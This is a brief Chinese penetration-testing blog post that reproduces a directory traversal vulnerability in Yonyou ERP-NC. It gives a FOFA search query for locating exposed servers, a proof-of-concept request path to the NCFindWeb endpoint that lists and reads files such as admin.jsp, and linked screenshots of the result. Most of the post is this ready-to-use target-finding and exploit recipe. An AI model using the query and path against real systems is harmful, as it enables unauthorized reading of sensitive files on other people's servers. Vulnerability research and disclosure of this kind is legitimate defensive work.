剑胆琴心
剑胆琴心

⽤友ERP-NC ⽬录遍历漏洞

剑胆琴心 剑胆琴心 收录于 渗透测试
   约 98 字  预计阅读 1 分钟 

漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息

fofa语法

1

app="⽤友-UFIDA-NC"

https://geoer666-1257264766.cos.ap-beijing.myqcloud.com/%E7%94%A8%E5%8F%8Bfofa.jpg

复现

POC:

1

 /NCFindWeb?service=IPreAlertConfigService&filename=

https://geoer666-1257264766.cos.ap-beijing.myqcloud.com/%E7%94%A8%E5%8F%8B%E4%BA%BApoc1.jpg

查看文件(这里以admin.jsp为例):

https://geoer666-1257264766.cos.ap-beijing.myqcloud.com/%E7%94%A8%E5%8F%8Bpoc.jpg

更新于 2023-12-04 
CC BY-NC 4.0
阅读原始文档
漏洞复现用友ERP-NC
返回 | 主页
0%